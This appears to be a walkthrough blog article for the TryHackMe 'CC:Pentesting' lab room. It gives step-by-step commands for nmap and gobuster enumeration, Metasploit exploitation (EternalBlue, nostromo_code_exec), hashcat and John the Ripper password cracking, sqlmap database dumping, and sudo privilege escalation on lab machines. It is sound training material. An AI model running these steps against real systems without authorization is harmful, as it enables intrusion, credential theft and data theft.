This is an article to provide assistance to the CC:Pentesting TryHackMe room.
Prerequisites:
- Access to Internet and a TryHackMe account
- Access the room found here:
Part 1: Introduction
- This section is mainly just notes and introduces you the basic skills you will need to get through this room.
- After you have completed the reading through, click on the green button and your screen should appear as seen below
[Section 1 — Network Utilities] — nmap
- This task will require you to explore the nmap man page and extract the relevant queries for me. You can either use the command line by typing in
man nmap
or alternatively you could use the following website:
- After answering all the relevant questions, you can then deploy the machine and begin practically scanning the machine.
- You can run a comprehensive scan using the following command:
nmap -sC -sV <ip address>
- Replace the <ip address> with the machine’s IP. You should be able to answer the subsequent questions
[Section 1 — Network Utilities] — Netcat
- Note that netcat can be a very powerful tool making it easy to also make a reverse shell which can come in very handy on multiple pen testing engagements
- This section requires reading through netcat man page which can be accessed from the command line using
man nc
or alternatively, from the following website:
[Section 2 — Web Enumeration] — gobuster
- Gobuster is very powerful tool for website enumeration and will come in handy on the following sections as well
- This section requires reading through gobuster man page which can be accessed from the command line using
man gobuster
or alternatively, from the following websites:
- After this, you can deploy the machine and run gobuster on the website using the following command:
gobuster dir -u http://<IP ADDRESS> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x xxa
- Alternatively, you can execute the command without the -x xxa section so as to just find the hidden directory as seen below
gobuster dir -u http://<IP ADDRESS> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
- Replace the <IP ADDRESS> with the machine’s IP. You should be able to answer the subsequent questions
Section 2 — Web Enumeration] — nikto
- This section requires reading through nikto man page which can be accessed from the command line using
man nikto
or alternatively, from the following website:
[Section 3 — Metasploit]: Intro
- Metasploit is one of the most powerful tools for exploitation of a system’s vulnerability and a necessity to be familiar with
- For this section, just read through and select the green button
[Section 3 Metasploit]: Setting Up
- When using a Kali machine, Metasploit comes preinstalled but if not, then follow the instructions provided in this room to install Metasploit or alternatively you can follow the instructions provided in this article:
You can then run the msfconsole command to launch Metasploit. It can take upto a few minutes to launch depending on your PC’s capabilities
- After launching, a prompt similar to the one above should appear where you can execute the help command to answer the subsequent questions
[Section 3 — Metasploit]: — Selecting a module
- For this section, you can begin by using the search command to find the eternal blue module
search eternal blue
- You can then use the use command to select the eternal blue exploit using either of the following commands:
use 0
use exploit/windows/smb/ms17_010_eternalblue
- The subsequent questions can be answered using the options command. It will provide a hint to answer some of the questions
- The remaining questions may require a bit of research to answer. I made use of the following resources:
[Section 3 — Metasploit]: meterpreter
- This section can be answered by researching on meterpreter commands which can be executed. A helpful site for this might be:
[Section 3 — Metasploit]: Final Walkthrough
- This section involves using Metasploit to exploit a vulnerable machine. You can use all the skills learnt in previous Metasploit sections
- The steps you can use to exploit the machine would be
Search for the nostromo_code_exec exploit using search command
Use the exploit
Set the RHOST as the provided machine IP e.g. set RHOST 10.10.1.1
Set the LHOST as your own IP. This can be provided through the ip addr show. Note that if you are using OpenVPN, ensure you select the tun0 ip.
After all this, you are greeted with a basic shell that can only run a limited number of commands.
You can then cd to the directory provided and cat the contents of the file contained within the secret directory.
cd /var/nostromo/htdocs
ls
cd <secret directory>
ls
cat <file>
[Section 4 - Hash Cracking]: Intro
- This section introduces hash cracking which can be a very important concept to understand and manipulate during a pentest
- You can just read through the information provided and select the green button provided
[Section 4 — Hash Cracking]: Salting and Formatting
- This section introduces salting which is equally a security feature used to slow down cracking of hashes. It can be very useful especially considering the LinkedIn hack of 2012 where the passwords were not salted
- You can just read through the information provided and select the green button provided
[Section 4 — Hash Cracking]: hashcat
- This section requires reading through hashcat man page which can be accessed from the command line using
man hashcat
or alternatively, from the following websites:
- A hash is also provided in this section which can be cracked by copying it into a file with any name and using the command
hashcat -m 17600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
where :
-m 17600 represents the type of hash being cracked (SHA3–512)
-a 0 represents that it is a dictionary attack
-o points to the output file for the cracked password
hash.txt is the name of the file storing the provided hash.
/usr/share/wordlists/rockyou.txt is the wordlist we will be using to crack the hash.
- The same command can be executed to crack the remaining hashes while only replacing the -m 17600 part with the mode number for the hash being cracked.
[Section 4 — Hash Cracking]: John The Ripper
- This section introduces an alternative password cracking tool.
- This section requires reading through the john the ripper man page which can be accessed from the command line using
man john
or alternatively, from the following websites:
- To crack the hashes provided for this section, we can pass the hashes to a single file under any name and run the command:
john — wordlist=rockyou.txt hashes.txt
john — show hashes.txt
where:
— wordlist represents the wordlist to be used
hashes.txt represents the file storing the hashes
— show is used to show the final value of the cracked passwords
- Note that the hashes can also be cracked using online sites incase your machine is unable to. The following sites can be used:
[Section 5 — SQL Injection]: Intro
- This section involves an introduction to SQL injection which can be useful if you want to be a bug bounty hunter but also just for a general pentest.
- Read through the material and select the green button at the end of the section
[Section 5 — SQL Injection]: sqlmap
- This section requires reading through the john the ripper man page which can be accessed from the command line using
man sqlmap
or alternatively, from the following websites:
[Section 5 — SQL Injection]: A Note on Manual SQL Injection
- This notes a very important point. Do not be overdependent on tools without knowing how to manually carry out the exploit. A useful resource is provided for detailing manual SQL exploits.
[Section 5 — SQL Injection]: Vulnerable Web Application
- This section involves using the sqlmap to exploit the web machine that you can deploy.
- You can begin by executing the following command replacing <IP ADDRESS> with your machine’s IP. The resulting information should help you find out how many types of sqli have been discovered.
sqlmap -u http://<IP ADDRESS> — forms
- You can the dump the database using the following command replacing <IP ADDRESS> with your machine’s IP
sqlmap -u http://<IP ADDRESS> — forms — dump
- From the dump, you can scroll down to find the name of the databases and information about the tables as well.
[Section 6 — Samba]: Intro
- This section introduces Samba which is service common on Windows machines.
- Read through the material and select the green button at the end of the section
[Section 6 — Samba]: smbmap
- This section requires reading through the smbmap man page which can be accessed from the command line using
man smbmap
or alternatively, from the following websites:
[Section 6 — Samba]: smbclient
- This extends Samba by offering smbclient which differs from smbmap by offering you an interactive prompt. It might require installation which can be done through:
apt install smbclient
- This section requires reading through the smbclient man page which can be accessed from the command line using
man smbclient
or alternatively, from the following websites:
[Section 6 — Samba]: A note about impacket
- This section talks about impacket which is a collection of windows scripts. It also mentions that it contains scripts that use samba to enumerate and possibly gain shell access to windows machines. A link is provided to these scripts:
The room can be completed by selecting the green button at the bottom
[Miscellaneous]: A note on privilege escalation
- This section provides notes on privilege escalation and various resources you can use.
- After going through the content, you can complete the room by selecting the green button at the bottom of the page
[Section 7 — Final Exam]: Good Luck :D
- This section involves a mini-CTF challenge.
i) You can begin by launching the machine then scanning the ports to find open ports and services running. You can use the command
nmap -sC -sV <IP Address>
ii) Remember to replace <IP Address> with your machine’s IP Address.
iii) After that, you can then use gobuster to enumerate any hidden directories. You can run the command below
gobuster dir -u http://<IP ADDRESS> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
iv) You will discover a hidden directory which you can then again run further enumeration on using gobuster by running the following command:
gobuster dir -u http://<IP ADDRESS>/<hidden-dir> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
v) Replace <hidden-dir> with the name of the hidden directory you found in iv)
vi) From here, you can find the credentials you can use to access the machine. You will provided with a username and a hashed password
vii) You can crack the hash of the password using either an online page or the online tools such as hashcat or john the ripper.
viii) Finally use the credentials to log in to the machine and navigate to the home directory to find the user.txt file. You can use the command
cd ~/
ls
cat user.txt
ix) From here, elevate your privileges to super user. Lucky for us, no password was required. Navigate to the root user’s directory to find the root.txt flag. You can use the following commands
sudo su
cd ~/
ls
cat root.txt
Conclusion
- Congratulations on now completing the CC:Pen Testing room on TryHackMe.
- You can choose to continue your exploration of Pentesting through the provided resources on the page or explore a different TryHackMe room.